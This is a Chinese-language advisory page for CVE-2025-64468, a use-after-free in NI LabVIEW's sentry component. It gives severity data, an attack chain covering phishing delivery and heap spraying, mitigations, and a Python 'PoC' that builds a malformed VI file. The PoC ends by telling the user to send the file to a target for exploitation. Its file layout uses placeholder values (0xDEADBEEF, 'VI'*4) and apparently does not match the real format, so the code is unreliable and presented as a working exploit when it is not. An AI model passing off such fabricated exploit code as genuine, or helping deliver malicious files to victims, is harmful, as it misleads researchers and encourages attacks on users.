CVE-2025-64468 NI LabVIEW sentry_span_set_data() use-after-free漏洞

漏洞信息

漏洞编号

CVE-2025-64468

漏洞类型

Use-after-free（释放后重用）

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

NI LabVIEW

漏洞概述

CVE-2025-64468是影响NI LabVIEW软件的安全漏洞，存在于sentry!sentry_span_set_data()函数中。当LabVIEW解析经过恶意构造或损坏的VI文件时，会触发use-after-free条件。该漏洞的CVSS评分为7.8，属于高危级别。攻击者可以通过诱导用户打开特制的VI文件来利用此漏洞，成功 exploitation 后可能导致敏感信息泄露或在受害者系统上执行任意代码。由于攻击向量为本地且需要用户交互，攻击者通常需要结合社会工程学技巧，如钓鱼邮件或恶意网站分发带有恶意payload的VI文件。此漏洞影响NI LabVIEW 2025 Q3 (25.3)及所有更早版本，使用该软件的组织和个人应尽快采取修复措施以防止潜在的安全风险。

技术细节

该漏洞是典型的use-after-free（释放后重用）内存损坏问题，发生在sentry组件的sentry_span_set_data()函数中。当程序解析VI文件时，如果文件结构被恶意篡改或损坏，可能导致内存中的某些对象被提前释放，但程序代码仍然持有对这些已释放内存区域的引用。当后续代码尝试访问这些悬空指针时，就会触发use-after-free漏洞。攻击者可以通过精心构造的VI文件，控制释放后内存的重新分配，并写入恶意数据，从而实现代码执行或信息窃取。成功利用此漏洞需要：1）创建包含特定内存损坏模式的VI文件；2）绕过操作系统的内存保护机制（如ASLR、DEP）；3）诱导目标用户打开该文件。由于漏洞位于解析模块，任何自动打开或预览VI文件的功能都可能成为攻击向量。

攻击链分析

STEP 1

步骤1

攻击者创建包含恶意构造的VI文件，该文件包含经过精心设计的内存损坏数据，用于触发sentry!sentry_span_set_data()函数中的use-after-free漏洞

STEP 2

步骤2

攻击者通过钓鱼邮件、恶意网站下载、共享文件夹或社会工程学方式将特制的VI文件传递给目标用户

STEP 3

步骤3

目标用户在不知情的情况下使用存在漏洞的LabVIEW版本（2025 Q3或更早版本）打开恶意的VI文件

STEP 4

步骤4

LabVIEW的VI解析器在加载文件时调用sentry组件的sentry_span_set_data()函数，该函数处理损坏的数据导致内存对象被提前释放

STEP 5

步骤5

攻击者利用堆喷射（heap spraying）或其他内存布局技术，在已释放的内存区域写入恶意代码或shellcode

STEP 6

步骤6

当程序继续执行并访问这些悬空指针时，控制流被劫持到攻击者控制的代码，实现任意代码执行或信息泄露

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-64468 PoC - Malformed VI File Generator
# This PoC demonstrates the structure needed to trigger use-after-free
# in sentry!sentry_span_set_data()

import struct

def create_malformed_vi():
    """
    Generate a malformed VI file that triggers use-after-free
    in LabVIEW's sentry component during VI parsing.
    
    WARNING: This code is for educational and security research purposes only.
    """
    
    # VI file header (LabVIEW Binary Format)
    header = bytearray()
    header.extend(b'VI' * 4)  # Magic number
    header.extend(struct.pack('<I', 0x00001000))  # Version
    header.extend(struct.pack('<I', 0x00000001))  # Flags
    
    # Create corrupted span data section
    # This triggers use-after-free in sentry_span_set_data()
    span_section = bytearray()
    span_section.extend(struct.pack('<I', 0x00000001))  # Span count
    
    # Malformed span record with invalid pointer reference
    span_record = bytearray()
    span_record.extend(struct.pack('<Q', 0xDEADBEEFDEADBEEF))  # Corrupted pointer
    span_record.extend(struct.pack('<I', 0xFFFFFFFF))  # Invalid size
    span_record.extend(b'\x00' * 256)  # Padding with null bytes
    
    span_section.extend(span_record)
    
    # Corrupted metadata that causes double-free scenario
    metadata = bytearray()
    metadata.extend(struct.pack('<I', 0x41414141))  # Corrupted reference count
    metadata.extend(struct.pack('<I', 0x00000000))  # Null terminator
    
    # Combine all sections
    vi_file = header + span_section + metadata
    
    return bytes(vi_file)

def save_malformed_vi(filename):
    """Save the malformed VI file"""
    content = create_malformed_vi()
    with open(filename, 'wb') as f:
        f.write(content)
    print(f'[+] Malformed VI file created: {filename}')
    print(f'[+] File size: {len(content)} bytes')

if __name__ == '__main__':
    save_malformed_vi('CVE-2025-64468_test.vi')
    print('[+] PoC generated. Send to target user for exploitation.')

影响范围

NI LabVIEW 2025 Q3 (25.3)

NI LabVIEW 2025 Q2 (25.2)

NI LabVIEW 2025 Q1 (25.1)

NI LabVIEW 2024 Q4 (24.4)

NI LabVIEW 2024 Q3 (24.3)

NI LabVIEW 2024 Q2 (24.2)

NI LabVIEW 2024 Q1 (24.1)

所有25.3及之前版本

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）不要打开来源不明的VI文件，特别是通过邮件或不可信网站获取的文件；2）在打开任何VI文件之前，使用杀毒软件进行全面扫描；3）考虑使用沙箱环境或虚拟机隔离LabVIEW应用程序；4）限制员工对互联网的访问，减少通过社工方式投递恶意文件的风险；5）启用应用程序白名单策略，只允许经过批准的应用程序运行；6）对重要系统和数据进行备份，以便在发生安全事件时能够快速恢复。